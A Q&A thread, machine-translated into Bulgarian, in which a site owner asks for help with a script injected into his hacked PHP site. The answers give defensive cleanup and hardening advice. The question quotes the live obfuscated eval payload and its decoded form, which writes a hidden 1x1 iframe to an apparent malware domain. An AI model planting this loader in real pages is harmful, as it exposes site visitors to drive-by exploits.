Имам нужда от помощ за идентифициране на злонамерен JavaScript код, който беше поставен на моя хакнат уебсайт [затворен]

index.php файлът на моя уебсайт е бил засегнат от даден по-долу скрипт. поради това на google ми беше забранен достъп. моля някой да ми каже какъв вид атака е това и има ли решение.

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%30%36%36%37%31%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

FWIW, некодираната версия на горното е

eval(document.write('<iframe src="http://podfer.com/?5066718" width=1 height=1></iframe>'));

Благодаря и поздрави

тисмон


php virus
person tismon    schedule 29.09.2010    source източник
comment
Опа! просто стартирайте това в моя браузър Firebug Javascript конзола и компютърът ми играе тетрис сам :~)   -  person Breaking not so bad    schedule 29.09.2010
comment
@ring0 това е отдаденост   -  person Alexander Sagen    schedule 29.09.2010
comment
@tismon Това е само код за вмъкване на iframe във вашия сайт, както би направил всеки зловреден софтуер. Необходима е повече информация. Използвате ли софтуер, като wordpress или подобен?   -  person Alexander Sagen    schedule 29.09.2010
comment
не, той е проектиран от мен в php 4 и oracle и освен това всички файлове index.php в моята основна папка са засегнати от този скрипт.   -  person tismon    schedule 29.09.2010
comment
Понякога вашият софтуер може да бъде хакнат, понякога вашият хост може да е бил хакнат (от отдалечен потребител, атакуващ apache, IIS и т.н. или дори друг локален потребител с акаунт на същия хост). Не можем да помогнем с решение, без да познаваме в детайли вашия софтуер. PHP 4 силно предполага, че трябва да го пренапишете като цяло - PHP 4 не трябва да се използва на този етап повече. Той е много остарял и последното, което знаех, е конфигуриран с несигурни настройки по подразбиране. Ако вашият уеб хост не поддържа PHP 5, предлагам да намерите нов хост.   -  person JAL    schedule 29.09.2010
comment
Това препраща към страница, която дава дълъг кодиран низ, който, когато се декодира, е Java и/или Flash експлойт код, вмъкнат чрез XHR, или нещо подобно (което всеки може да познае, предполагам). ФЛАШСПРЕЙ, хм. Добър стар Flash, винаги е добър за вектори на злонамерени атаки.   -  person JAL    schedule 29.09.2010

Отговори (3)


arrow_upward
1
arrow_downward

Звучи така: текст на връзката

От ограничената информация, която публикувахте, мога почти да гарантирам, че използвате някакъв софтуер с отворен код на този сайт - Може би не на точния сайт, който е засегнат, но вероятно има някои на сървъра....и това е също така няма вероятност да бъде закърпен до настоящите стандарти. Виждал съм да се случва с phpBB, Joomla (особено Joomla), phpMyAdmin и Wordpress. Това е почти плашещо често срещано и 99% от времето не е толкова сложно, колкото мнозина смятат, че може да бъде. Случи ми се при много стара тестова инсталация на Mambo и по време на работа с фалшива инсталация на phpBB, че някой от ИТ персонала се промъкна на сървъра, за да комуникира с тяхната фентъзи футболна лига.

Работата е там, че хакерите са мързеливи. Освен ако нямате нещо, което наистина искат, няма причина да отидат и да ви хакнат поотделно... не си струва времето им. Въпреки това, ако изпълнявате обичайно парче код с използваема кодова база, те могат да сканират сайтове за него на случаен принцип и когато намерят дупката, да атакуват автоматично. Ето защо кодът ще бъде идентичен по съдържание и местоположение почти през цялото време.

Паркирайте сайта...поставете страница "в процес на изграждане". Издърпайте кода си надолу и го изтъркайте, независимо дали на ръка или автоматизирано. Сега спри! Актуализирайте целия код с отворен код, независимо колко скорошен е той. Сега направете проверки за надеждност на разрешения, SQL заявки (особено полета за търсене, които не са екранирани) и системи за потребителски разрешения. Изпълнете тестове за инжектиране на скрипт. Накрая, след като всичко е изчистено по най-добрия начин, тествайте, тествайте, тествайте. И накрая, мислех, че вероятно няма много общо с проблема, променете паролата си и използвайте добра стратегия за парола, за да я защитите.

Късмет. Бъди внимателен!

person bpeterson76    schedule 29.09.2010
comment
@Alexander Sagen, @ring0 благодаря много за отговора.. в момента проверявам всички страници и премахвам скриптовете ръчно.. - person tismon; 29.09.2010
comment
Това всъщност не е свързано с отворен код или не. Много петнистата история на IIS и IE показва, че софтуерът със затворен код е еднакво уязвим на различни атаки. - person JAL; 29.09.2010
comment
Алекс, вярно е. Просто изглежда, че удря отворен код много повече, защото кодът е там, за да бъде хакнат. Единственото ни средство е да внедрим корекциите, с които общността върши чудесна работа. Но се обзалагам, че от 15 базирани на отворен код сайта, за които знам (управлявани от приятели, колеги, познати), само 10 наскоро са приложили необходимите корекции, за да останат в безопасност... и това е огромен проблем в моята книга. Що се отнася особено до Microsoft и IE, истинско чудо е, че IE6 никога не е класифициран като шпионски софтуер поради списъка с дупки, които имаше... - person bpeterson76; 29.09.2010

arrow_upward
0
arrow_downward

Какво каза bpeterson76, но също така:

Ако е вярно, че не изпълнявате общ софтуер на вашата система, първо бих проверил собствените ви скриптове, особено ако правите някакъв запис във файловата система навсякъде. Но също така може да е остарял сървърен софтуер като apache или каквото имате, което разкрива дупка в сигурността. Малко вероятно е да е SQL инжектиране, тъй като към вашите файлове са добавени данни.

В зависимост от вашия хостинг, или актуализирайте целия си сървърен софтуер, или попитайте вашия хостинг доставчик.

Имате ли регистрационни файлове? Един добър поглед върху тях може да разкрие дупката. Ако сте на споделен хостинг, при някои настройки други клиенти могат да пишат във вашите файлове, ако вашите разрешения за файлове са твърде разрешителни.

person Alexander Sagen    schedule 29.09.2010

arrow_upward
0
arrow_downward

Всъщност имах подобна атака срещу моите сайтове не много отдавна. Първо, проверете папките под вашия уеб корен за php файлове, наречени на функции. Моите бяха opendir, iswritable и т.н. Трябва да видите повече base64 кодиран скрипт в тези файлове. Ако не го направите, може да няма връзка. Във всеки случай записът who.is за podfer.com има някаква информация за него. Свържете се с хостинг компанията на този уебсайт и им кажете, че стартира CSS атаки, те трябва да го изключат без много проблеми. Получих хакера, който ми действаше по този начин.

Също така, ако използвате Mosso/rackspace, трябва да влезете и да затегнете вашите разрешения за файлове.

person Mike    schedule 29.09.2010